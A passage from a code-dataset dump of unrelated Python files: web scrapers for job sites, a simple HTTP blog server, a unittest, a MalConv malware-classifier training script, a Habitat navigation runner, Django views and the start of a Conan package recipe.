lista\n","sub_path":"venv/customized/ScrapperSiteQuemDisse.py","file_name":"ScrapperSiteQuemDisse.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337970642","text":"filename = \"10.5.txt\"\n\nwhile True:\n reason = input(\"Why do you like programming?(q = quit): \")\n\n if reason == \"q\":\n break\n\n with open(filename, 'a') as file_object:\n file_object.write(reason + '\\n')\n\n","sub_path":"10.5.py","file_name":"10.5.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516111549","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport pandas as pd\n\n\ndef format_html(word):\n for x in range(len(word)):\n if word[0:1] == '\\n':\n return format_html(word[1:])\n elif word[0:1] == \" \":\n return format_html(word[1:])\n else:\n return word\n\ndef format_links(site_link, link):\n return (site_link + link)\n\n\n#File for all scraped data functions\n\ndef get_indeed():\n indeed = requests.get(\"https://www.indeed.ca/jobs?q=software+co-op&l=Toronto\")\n print(indeed)\n\n soup = BeautifulSoup(indeed.content, 'html.parser')\n\n jobs_column = soup.find(id='resultsCol')\n\n job_names_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .title a.jobtitle\")\n job_names = [name.get_text() for name in job_names_container]\n\n job_companies_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .sjcl span.company\")\n job_companies = [company.get_text() for company in job_companies_container]\n\n job_location_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .sjcl .location\")\n job_location = [location.get_text() for location in job_location_container]\n\n job_description_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .summary\")\n job_description = [description.get_text() for description in job_description_container]\n\n job_links_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .title a[href]\")\n job_links = [links.get(\"href\") for links in job_links_container]\n\n for x in range(len(job_names)):\n job_names[x] = format_html(job_names[x])\n job_companies[x] = format_html(job_companies[x])\n job_location[x] = format_html(job_location[x])\n job_description[x] = format_html(job_description[x])\n job_links[x] = format_links(\"https://www.indeed.ca\", job_links[x])\n\n\n job = pd.DataFrame({\n \"job_names\": job_names,\n \"job_companies\": job_companies,\n \"job_locations\": job_location,\n \"job_description\": job_description,\n \"job_links\": job_links\n })\n pd.set_option('display.max_colwidth', -1)\n\n return job\n\n\ndef get_glassdoor():\n\n url = \"https://www.glassdoor.ca/Job/software-intern-jobs-SRCH_KO0,15.htm\"\n\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n glassdoor = urlopen(req).read()\n\n if(glassdoor):\n print(\"Glassdoor: 200\")\n\n\n page_soup = BeautifulSoup(glassdoor, 'html.parser')\n\n jobs_column = page_soup.find(id='JobResults')\n\n job_names_container = jobs_column.select(\".jl .jobContainer > a.jobLink.jobInfoItem.jobTitle \")\n job_names = [name.get_text() for name in job_names_container]\n\n job_companies_container = jobs_column.select(\".jl .jobContainer .jobHeader a div.jobInfoItem\")\n job_companies = [company.get_text() for company in job_companies_container]\n\n job_location_container = jobs_column.select(\".jl .jobContainer .jobInfoItem span.subtle\")\n job_location = [location.get_text() for location in job_location_container]\n\n job_description = []\n for i in range(len(job_location_container)):\n job_description.append(\"Not Available\")\n\n job_links_container = jobs_column.select(\".jl .jobContainer .jobHeader a[href]\")\n job_links = [links.get(\"href\") for links in job_links_container]\n\n print(len(job_names))\n print(len(job_links))\n\n for x in range(len(job_names)):\n job_names[x] = format_html(job_names[x])\n job_companies[x] = format_html(job_companies[x])\n job_location[x] = format_html(job_location[x])\n job_description[x] = format_html(job_description[x])\n job_links[x] = format_links(\"https://www.glassdoor.ca\", job_links[x])\n\n\n job = pd.DataFrame({\n \"job_names\": job_names,\n \"job_companies\": job_companies,\n \"job_locations\": job_location,\n \"job_description\": job_description,\n \"job_links\": job_links\n })\n pd.set_option('display.max_colwidth', -1)\n\n return job","sub_path":"venv/data_scrapes.py","file_name":"data_scrapes.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"39041386","text":"import numpy as np\nimport math\nimport argparse\n\nparser = argparse.ArgumentParser(description='NormSampleCompact')\nparser.add_argument('--d', type=int, default='4', metavar='N',\n help='number of electrons (default: 4)')\nparser.add_argument('--Nsample', type=int, default=1000, metavar='N',\n help='input number of nodes per layer (default: 1000)')\nargs = parser.parse_args()\n\n\n\nd = args.d\nNsample = args.Nsample\n\nnp.random.seed(1234) #for reproducibility\nx_traj = np.random.uniform(-1,1,(Nsample,d))\ny_traj = np.sum(np.power(x_traj,2),axis=1)\n\ndata_folder = 'data/'\nfilenameIpt = data_folder + 'square_'+ 'x_' + str(d) + '_Nsample_' + str(Nsample) +'.dat'\nfilenameOpt = data_folder + 'square_'+ 'y_' + str(d) + '_Nsample_' + str(Nsample) +'.dat'\n\nnp.savetxt(filenameIpt, x_traj)\nnp.savetxt(filenameOpt, y_traj)\n","sub_path":"sample_square.py","file_name":"sample_square.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423779489","text":"import http.server\nimport socketserver\nimport sqlite3\nfrom controller import *\nfrom model import *\nimport sys\nimport os\nfrom sys import version as python_version\nfrom cgi import parse_header, parse_multipart\n\nif python_version.startswith('3'):\n from urllib.parse import parse_qs\n#import view\n\nPORT = 8000\nclass myHandler(http.server.BaseHTTPRequestHandler):\n\t\n\tdef parse_POST(self):\n\t\tctype, pdict = parse_header(self.headers['content-type'])\n\t\tif ctype == 'multipart/form-data':\n\t\t\tpostvars = parse_multipart(self.rfile, pdict)\n\t\telif ctype=='application/x-www-form-urlencoded':\n\t\t\tlength = int(self.headers['content-length'])\n\t\t\tpostvars = parse_qs(\n\t\t\t\t\tself.rfile.read(length).decode('UTF-8'), \n\t\t\t\t\tkeep_blank_values=1)\n\t\telse:\n\t\t\tpostvars = {}\n\t\treturn postvars\n\tdef loadTemplate(self,which):\n\t\t\tf = open(which,'r')\n\t\t\tcontent = \"\"\n\t\t\tfor line in f.readlines():\n\t\t\t\tcontent += line\n\t\t\tf.close()\n\t\t\tcontent = content[content.find('<'):]\n\t\t\treturn str(content)\n\tdef do_POST(self):\n\t\t\n\t\tpostvars = self.parse_POST()\n\t\tc = Controller()\n\t\tc.addPost(postvars['name'][0],postvars['text'][0])\n\t\tcontent = self.loadTemplate(\"index.html\")\n\t\ttoreplace = self.loadTemplate(\"add_post.html\")\n\t\tcontent = content.replace(\"$$$CONTENT$$$\",toreplace)\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type','text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes(content,\"UTF-8\"))\n\tdef do_GET(self):\n\t\tprint(self.path)\n\t\tcontent = \"\"\n\t\tc = Controller()\n\t\tif self.path==\"/\" or self.path==\"/index.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\tlist1 = c.GetAllPosts()\n\t\t\tto_insert = self.loadTemplate(\"table_template.html\")\n\t\t\tallposts = \"\"\n\t\t\tfor i in range(len(list1)):\n\t\t\t\ttable_content = self.loadTemplate(\"posts_template.html\")\n\t\t\t\ttable_content = table_content.replace(\"$NAME$\",list1[i].name)\n\t\t\t\ttable_content = table_content.replace(\"$TEXT$\",list1[i].text)\n\t\t\t\tallposts += table_content\n\t\t\tto_insert = to_insert.replace(\"CONTENT\",allposts)\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",to_insert)\n\t\tif self.path==\"/about.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\tabout_text = c.about()\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",about_text)\t\n\t\tif self.path==\"/add.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\ttoreplace = self.loadTemplate(\"add_post.html\")\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",toreplace)\t\n\t\t\t\n\t#\tprint(self.query)\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type','text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes(content,\"UTF-8\"))\n\t\t\nhttpd = socketserver.TCPServer((\"\", PORT), myHandler)\n\nprint (\"serving at port\", PORT)\nhttpd.serve_forever()\n\n","sub_path":"12BD02013/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373884104","text":"import unittest\nfrom solution import sherlockAndAnagrams as func\n\n# If the test_data were to continue to grow it'd make sense to move it into it's own file.\ntest_data = [\n {\n \"input\": \"abba\",\n \"solution\": 4\n },\n {\n \"input\": \"abcd\",\n \"solution\": 0\n },\n {\n \"input\": \"ifailuhkqq\",\n \"solution\": 3\n },\n {\n \"input\": \"kkkk\",\n \"solution\": 10\n },\n {\n \"input\": \"cdcd\",\n \"solution\": 5\n },\n # {\n # \"input\":\n # \"solution\":\n # },\n]\n\n\nclass TestSherlockAndAnagrams(unittest.TestCase):\n def test__func(self):\n for case in test_data:\n A = case[\"input\"]\n with self.subTest(f\"\\nA = {A}\\n\"):\n self.assertEqual(\n case[\"solution\"],\n func(A)\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"hacker-rank/sherlock-and-anagrams/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517024984","text":"import argparse\nimport os\nimport sys\n\nimport torch\n\nfrom src.model import MalConv\nfrom utils import Logger, ProgressBar, Chrono, dataloader, get_torch_vars, Utils, update_lr\n\n\nclass AndroConv:\n log_msg = '{}, {:.2f}, {:.10f}, {:.6f}, {:.4f}, {:.6f}, {:.4f}\\n'\n step_msg = 'Step: %s | Tot: %s | Lr: %.5f | Loss: %.3f | Acc: %.3f%% (%d/%d)'\n\n epochs = [1, 3, 5]\n classes = ('benign', 'malware')\n epoch = 0\n\n train_acc = 0\n test_acc = 0\n best_acc = 0\n\n train_loss = 0\n test_loss = 0\n\n pred = None\n confusion_matrix = None\n\n def __init__(self, args):\n self.initial_lr = args.learning_rate\n self.lr = args.learning_rate\n self.test_only = args.test_only\n self.dump_statistics = args.dump_statistics\n self.modelName = \"malconv\"\n self.experiment = args.experiment\n self.log_path = args.log_path\n self.save_path = args.save_path\n\n if not os.path.isdir(self.log_path):\n os.makedirs(self.log_path)\n\n self.logger = Logger('%s/%s_%s.csv' % (self.log_path, self.modelName, args.experiment),\n 'epoch, time, learning_rate, tr_loss, tr_acc, val_loss, val_acc')\n self.progress_bar = ProgressBar()\n self.chrono = Chrono()\n\n self.trainset, self.testset, self.trainloader, self.testloader = dataloader(args.first_n_byte)\n\n print('==> Building model..')\n self.model = MalConv(input_length=args.first_n_byte)\n\n if torch.cuda.is_available():\n self.model = torch.nn.DataParallel(self.model)\n torch.backends.cudnn.benchmark = True\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n\n if args.resume or self.test_only or self.dump_statistics:\n self.load()\n\n self.criterion = torch.nn.BCELoss()\n self.criterion = get_torch_vars(self.criterion, False)\n\n self.model = get_torch_vars(self.model, False)\n\n def run(self):\n if self.test_only:\n self.test()\n elif self.dump_statistics:\n self.test()\n self.dump_cmx()\n self.dump_measurements()\n else:\n for epoch in range(self.epoch, self.epochs[-1]):\n self.epoch = epoch\n print('\\nEpoch: %d' % (self.epoch + 1))\n\n with self.chrono.measure(\"epoch\"):\n self.train()\n self.test()\n\n self.log()\n\n if self.test_acc > self.best_acc:\n self.save()\n\n def train(self):\n self.model.train()\n self.train_loss = 0\n correct = 0\n total = 0\n self.pred = []\n self.progress_bar.newbar(len(self.trainloader))\n for batch_idx, (inputs, targets) in enumerate(self.trainloader):\n with self.chrono.measure(\"step_time\"):\n inputs = get_torch_vars(inputs)\n targets = get_torch_vars(targets)\n\n self.lr = update_lr(self.optimizer,\n self.epoch, self.epochs,\n self.initial_lr,\n batch_idx, len(self.trainloader))\n if self.lr is None:\n break\n\n self.optimizer.zero_grad()\n outputs = self.model(inputs)\n loss = self.criterion(outputs.double(), targets.double())\n loss.backward()\n self.optimizer.step()\n\n self.train_loss += loss.item()\n predicted = (outputs + 0.5).int()\n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n self.pred.append(outputs.cpu().data.numpy())\n\n msg = self.step_msg % (Utils.format_time(self.chrono.last('step_time')),\n Utils.format_time(self.chrono.total('step_time')),\n self.lr,\n self.train_loss / (batch_idx + 1),\n 100. * correct / total,\n correct,\n total)\n self.progress_bar.update(batch_idx, msg)\n\n self.chrono.remove(\"step_time\")\n self.train_acc = 100. * correct / total\n\n def test(self):\n self.model.eval()\n self.test_loss = 0\n correct = 0\n total = 0\n self.pred = []\n self.confusion_matrix = torch.zeros([len(self.classes), len(self.classes)], dtype=torch.int)\n with torch.no_grad():\n self.progress_bar.newbar(len(self.testloader))\n for batch_idx, (inputs, targets) in enumerate(self.testloader):\n with self.chrono.measure(\"step_time\"):\n inputs = get_torch_vars(inputs)\n targets = get_torch_vars(targets)\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs.double(), targets.double())\n\n self.test_loss += loss.item()\n predicted = (outputs + 0.5).int()\n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n self.pred.append(outputs.cpu().data.numpy())\n\n for t, p in zip(targets.view(-1), predicted.view(-1)):\n self.confusion_matrix[t.long(), p.long()] += 1\n\n msg = self.step_msg % (Utils.format_time(self.chrono.last('step_time')),\n Utils.format_time(self.chrono.total('step_time')),\n self.lr,\n self.test_loss / (batch_idx + 1),\n 100. * correct / total,\n correct,\n total)\n self.progress_bar.update(batch_idx, msg)\n\n self.chrono.remove(\"step_time\")\n self.test_acc = 100. * correct / total\n\n def load(self):\n print('==> Loading from save...')\n assert os.path.isdir('./%s' % self.save_path), 'Error: save directory not found!'\n state_dict = torch.load('./%s/%s_%s.pth' % (self.save_path, self.modelName, self.experiment))\n self.model.load_state_dict(state_dict['model'])\n self.optimizer.load_state_dict(state_dict['optimizer'])\n self.epoch = state_dict['epoch'] + 1\n self.best_acc = state_dict['acc']\n print('%s epoch(s) will run, save already has %s epoch(s) and best %s accuracy'\n % ((self.epochs[-1] - self.epoch), self.epoch, self.best_acc))\n\n def save(self):\n self.best_acc = self.test_acc\n print('Saving..')\n state = {\n 'model': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'acc': self.best_acc,\n 'epoch': self.epoch\n }\n if not os.path.isdir('./%s' % self.save_path):\n os.mkdir('./%s' % self.save_path)\n torch.save(state, './%s/%s_%s.pth' % (self.save_path, self.modelName, self.experiment))\n\n self.dump_predictions()\n self.dump_cmx()\n self.dump_measurements()\n\n def dump_predictions(self):\n test_pred = [item for sublist in list(self.pred) for item in sublist]\n with open('./%s/%s_%s.pred' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n for pred in test_pred:\n print('%.5f' % pred[0], file=f)\n\n def dump_cmx(self):\n with open('./%s/%s_%s.cmx' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n print(self.confusion_matrix.cpu().data.numpy(), file=f)\n\n def log(self):\n self.logger.write(self.log_msg.format(self.epoch + 1,\n self.chrono.last(\"epoch\"),\n self.lr,\n self.train_loss / len(self.trainloader), self.train_acc,\n self.test_loss / len(self.testloader), self.test_acc))\n\n def dump_measurements(self):\n with open('./%s/%s_%s.mea' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n tp = self.confusion_matrix.diag()\n for c in range(len(self.classes)):\n idx = torch.ones(len(self.classes)).byte()\n idx[c] = 0\n\n tn = self.confusion_matrix[idx.nonzero()[:, None], idx.nonzero()].sum()\n fp = self.confusion_matrix[idx, c].sum()\n fn = self.confusion_matrix[c, idx].sum()\n\n print('Class {}\\nTP {}, TN {}, FP {}, FN {}'.format(c, tp[c], tn, fp, fn), file=f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='PyTorch MalConv Training')\n parser.add_argument('-r', '--resume', action='store_true', help='resume from save')\n parser.add_argument('-t', '--test_only', action='store_true', help='Test only')\n parser.add_argument('-s', '--dump_statistics', action='store_true', help='Test and save all statistics')\n parser.add_argument('-l', '--learning_rate', default=3e-4, type=float, help='learning rate')\n parser.add_argument('-b', '--first_n_byte', default=8000000, type=int, help='First n bytes to read from binary')\n parser.add_argument('-x', '--experiment', default=1, help='Experiment number')\n parser.add_argument('-lp', '--log_path', default='logs', help='Path that log files stored')\n parser.add_argument('-sp', '--save_path', default='state_dicts', help='Path that pytorch save files stored')\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n AndroConv(parser.parse_args()).run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"365207054","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport argparse\nimport random\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport torch\nimport numpy as np\nfrom habitat.utils.visualizations import maps\nfrom habitat_baselines.common.baseline_registry import baseline_registry\nfrom habitat_baselines.config.default import get_config\n\n\nfrom habitat.tasks.utils import (\n cartesian_to_polar,\n quaternion_rotate_vector,\n)\n\n\nfrom typing import Any\nimport habitat\nfrom gym import spaces\nimport math\n\n# @habitat.registry.register_sensor(name=\"Agent_Orientation\")\n# class AgentOrientationSensor(habitat.Sensor):\n# def __init__(self, sim, config, **kwargs: Any):\n# super().__init__(config=config)\n\n# self._sim = sim\n\n# def _get_uuid(self, *args: Any, **kwargs: Any):\n# return \"agent_orientation\"\n\n# def _get_sensor_type(self, *args: Any, **kwargs: Any):\n# return habitat.SensorTypes.HEADING\n\n# # Defines the size and range of the observations of the sensor\n# def _get_observation_space(self, *args: Any, **kwargs: Any):\n# return spaces.Box(\n# low=np.finfo(np.float32).min,\n# high=np.finfo(np.float32).max,\n# shape=(3,),\n# dtype=np.float32,\n# )\n\n# def _quat_to_xy_heading(self, quat):\n# direction_vector = np.array([0, 0, -1])\n\n# heading_vector = quaternion_rotate_vector(quat, direction_vector)\n\n# phi = cartesian_to_polar(-heading_vector[2], heading_vector[0])[1]\n# return np.array(phi)\n\n# def get_observation(\n# self, observations, *args: Any, episode, **kwargs: Any\n# ):\n# return self._quat_to_xy_heading(self._sim.get_agent_state().rotation)\n\n\n\n# def get_get_topdown_map(sim):\n# top_down_map = maps.get_topdown_map(sim, map_resolution=(500, 500))\n# recolor_map = np.array(\n# [[255, 255, 255], [128, 128, 128], [0, 0, 0]], dtype=np.uint8\n# )\n# range_x = np.where(np.any(top_down_map, axis=1))[0]\n# range_y = np.where(np.any(top_down_map, axis=0))[0]\n# padding = int(np.ceil(top_down_map.shape[0] / 125))\n# range_x = (\n# max(range_x[0] - padding, 0),\n# min(range_x[-1] + padding + 1, top_down_map.shape[0]),\n# )\n# range_y = (\n# max(range_y[0] - padding, 0),\n# min(range_y[-1] + padding + 1, top_down_map.shape[1]),\n# )\n# top_down_map = top_down_map[\n# range_x[0] : range_x[1], range_y[0] : range_y[1]\n# ]\n# top_down_map = recolor_map[top_down_map][:,:,0]\n# left=(1500-top_down_map.shape[1])//2\n# right=1500-top_down_map.shape[1]-left\n# top=(1500-top_down_map.shape[0])//2\n# bot=1500-top_down_map.shape[0]-top\n# top_down_map=np.pad(top_down_map,((top, bot), (left, right)), 'constant', constant_values=((255,255), (255,255)))\n# return top_down_map\n\n#############################################################\nnothin = torch.rand(100,100)\n\n@habitat.registry.register_sensor(name=\"Agent_Position\")\nclass AgentPositionSensor(habitat.Sensor):\n def __init__(self, sim, config, **kwargs: Any):\n super().__init__(config=config)\n\n self._sim = sim\n\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"agent_position\"\n\n def _get_sensor_type(self, *args: Any, **kwargs: Any):\n return habitat.SensorTypes.POSITION\n\n # Defines the size and range of the observations of the sensor\n def _get_observation_space(self, *args: Any, **kwargs: Any):\n return spaces.Box(\n low=np.finfo(np.float32).min,\n high=np.finfo(np.float32).max,\n shape=(3,),\n dtype=np.float32,\n )\n\n def get_observation(\n self, observations, *args: Any, episode, **kwargs: Any\n ):\n return self._sim.get_agent_state().position\n\n\n\n@habitat.registry.register_sensor(name=\"Agent_Map\")\nclass AgentMapSensor(habitat.Sensor):\n def __init__(self, sim, config, **kwargs: Any):\n super().__init__(config=config)\n self._sim = sim\n\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"agent_map\"\n\n def _get_sensor_type(self, *args: Any, **kwargs: Any):\n return habitat.SensorTypes.MAP\n\n # Defines the size and range of the observations of the sensor\n def _get_observation_space(self, *args: Any, **kwargs: Any):\n return spaces.Box(\n low=np.finfo(np.float32).min,\n high=np.finfo(np.float32).max,\n shape=(100,100),\n # shape=(, get_get_topdown_map(self._sim).shape[1]),\n dtype=np.float32,\n )\n\n def get_observation(\n self, observations, *args: Any, episode, **kwargs: Any\n ):\n return torch.zeros(100,100)\n\n@habitat.registry.register_measure\nclass EpisodeInfoExample(habitat.Measure):\n def __init__(self, sim, config, **kwargs: Any):\n # This measure only needs the config\n self._config = config\n super().__init__()\n\n # Defines the name of the measure in the measurements dictionary\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"episode_info\"\n\n # This is called whenver the environment is reset\n def reset_metric(self, *args: Any, episode, **kwargs: Any):\n # Our measure always contains all the attributes of the episode\n self._metric = vars(episode).copy()\n # But only on reset, it has an additional field of my_value\n # self._metric[\"my_value\"] = self._config.VALUE\n\n # This is called whenver an action is taken in the environment\n def update_metric(self, *args: Any, episode, action, **kwargs: Any):\n # Now the measure will just have all the attributes of the episode\n self._metric = vars(episode).copy()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--run-type\",\n choices=[\"train\", \"eval\"],\n required=True,\n help=\"run type of the experiment (train or eval)\",\n )\n parser.add_argument(\n \"--exp-config\",\n type=str,\n required=True,\n help=\"path to config yaml containing info about experiment\",\n )\n parser.add_argument(\n \"opts\",\n default=None,\n nargs=argparse.REMAINDER,\n help=\"Modify config options from command line\",\n )\n args = parser.parse_args()\n run_exp(**vars(args))\n\n\ndef run_exp(exp_config: str, run_type: str, opts=None) -> None:\n r\"\"\"Runs experiment given mode and config\n\n Args:\n exp_config: path to config file.\n run_type: \"train\" or \"eval.\n opts: list of strings of additional config options.\n\n Returns:\n None.\n \"\"\"\n config = get_config(exp_config, opts)\n config.defrost()\n\n # Add things to the config to for the measure\n config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE = habitat.Config()\n # The type field is used to look-up the measure in the registry.\n # By default, the things are registered with the class name\n config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE.TYPE = \"EpisodeInfoExample\"\n # config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE.VALUE = 5\n # Add the measure to the list of measures in use\n config.TASK_CONFIG.TASK.MEASUREMENTS.append(\"EPISODE_INFO_EXAMPLE\")\n\n\n config.TASK_CONFIG.TASK.AGENT_MAP_SENSOR = habitat.Config() ###\n config.TASK_CONFIG.TASK.AGENT_MAP_SENSOR.TYPE = \"Agent_Map\" ###\n config.TASK_CONFIG.TASK.SENSORS.append(\"AGENT_MAP_SENSOR\")\n config.TASK_CONFIG.TASK.MEASUREMENTS.append(\"TOP_DOWN_MAP\")\n\n\n\n config.TASK_CONFIG.TASK.AGENT_POSITION_SENSOR = habitat.Config() ###\n config.TASK_CONFIG.TASK.AGENT_POSITION_SENSOR.TYPE = \"Agent_Position\" ###\n config.TASK_CONFIG.TASK.SENSORS.append(\"AGENT_POSITION_SENSOR\")\n\n\n###\n \n##\n\n config.TASK_CONFIG.TASK.SENSORS.append(\"HEADING_SENSOR\")\n config.freeze()\n\n random.seed(config.TASK_CONFIG.SEED)\n np.random.seed(config.TASK_CONFIG.SEED)\n\n trainer_init = baseline_registry.get_trainer(config.TRAINER_NAME)\n assert trainer_init is not None, f\"{config.TRAINER_NAME} is not supported\"\n trainer = trainer_init(config)\n\n if run_type == \"train\":\n trainer.train()\n elif run_type == \"eval\":\n trainer.eval()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"habitat_baselines/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354928578","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .forms import Sign_up_form, Free_Quotation_form, CreateUserForm, StatusForm\nfrom .models import Sign_up, Free_Quotation\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import unauthenticated_user, allowed_users\n\n\n\ndef registerPage(request):\n\tif request.user.is_authenticated:\n\t\treturn redirect('home')\n\telse:\n\t\tform = CreateUserForm()\n\t\tif request.method == 'POST':\n\t\t\tform = CreateUserForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\tuser = form.cleaned_data.get('username')\n\t\t\t\tmessages.success(request, 'Account was created for ' + user)\n\n\t\t\t\treturn redirect('login')\n\t\t\t\n\n\t\tcontext = {'form':form}\n\t\treturn render(request, 'Project/register.html', context)\n\ndef loginPage(request):\n\tif request.user.is_authenticated:\n\t\treturn redirect('home')\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tusername = request.POST.get('username')\n\t\t\tpassword =request.POST.get('password')\n\n\t\t\tuser = authenticate(request, username=username, password=password)\n\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('home')\n\t\t\telse:\n\t\t\t\tmessages.info(request, 'Username or Password is Incorrect')\n\n\t\tcontext = {}\n\t\treturn render(request, 'Project/login.html', context)\n\n\ndef logoutUser(request):\n\tlogout(request)\n\treturn redirect('login')\n\n\n# @login_required(login_url='login')\ndef Home(request):\n picture = Free_Quotation.objects.all()\n return render(request, 'Project/Home.html', {'picture': picture})\n\n@login_required(login_url='login')\ndef About_us(request):\n return render(request, 'Project/AboutUs.html')\n\n\n@login_required(login_url='login')\ndef Contact_us(request):\n return render(request, 'Project/ContactUs.html')\n\n\ndef Warning(request):\n return render(request, 'Project/warningpage.html')\n\n\n# def Signup(request):\n# form = Sign_up_form()\n# if request.method == 'POST':\n# form = Sign_up_form(request.POST)\n# if form.is_valid():\n# form.save()\n# return redirect('/login')\n# context = {'form' :form}\n# return render(request, 'Project/Signup.html', context)\n\n# @login_required(login_url='login')\n# def Table(request):\n# table = Sign_up.objects.all()\n# return render(request, 'Project/table.html', {'table': table})\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['Admin'])\ndef Table1(request):\n table = Free_Quotation.objects.all()\n done = table.filter(status='Done').count()\n pending = table.filter(status='Pending').count()\n form = StatusForm()\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('/table')\n context = {'form':form,'table': table, 'done': done, 'pending': pending}\n return render(request, 'Project/table1.html', context)\n\n@allowed_users(allowed_roles=['Users'])\n@login_required(login_url='login')\ndef Free_Quote(request):\n form = Free_Quotation_form()\n if request.method == 'POST':\n form = Free_Quotation_form(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {'form' :form}\n return render(request, 'Project/FreeQuotation.html', context)\n\n\n@login_required(login_url='login')\n# def update(request, pk):\n# # person = Sign_up.objects.get(id=pk)\n# # form = Sign_up_form(instance=person)\n# # if request.method == 'POST':\n# # form = Sign_up_form(request.POST, instance=person)\n# # if form.is_valid():\n# # form.save()\n# # return redirect('/table')\n# # context = {'formn' :form}\n# # return render(request, 'Project/FreeQuotation.html', context)\n\ndef update(request, pk):\n user = Free_Quotation.objects.get(id=pk)\n form = StatusForm(instance=user)\n\n if request.method == 'POST':\n form = StatusForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect('/table1')\n\n context = {'form':form}\n return render(request, 'Project/FreeQuotation.html', context)\n\n\n\n\n\n","sub_path":"AoeApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247460543","text":"from conans import CMake, ConanFile, tools\nimport os\n\n\nclass LibqrencodeConan(ConanFile):\n name = \"libqrencode\"\n description = \"A fast and compact QR Code encoding library\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/fukuchi/libqrencode\"\n license = (\"LGPL-2.1-or-later\")\n exports_sources = \"CMakeLists.txt\", \"patches/**\"\n generators = \"cmake\", \"cmake_find_package\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n requires = (\n \"libiconv/1.15\",\n \"libpng/1.6.37\",\n )\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.cppstd\n del self.settings.compiler.libcxx\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n os.rename(\"libqrencode-{}\".format(self.version), self._source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"WITH_TOOLS\"] = 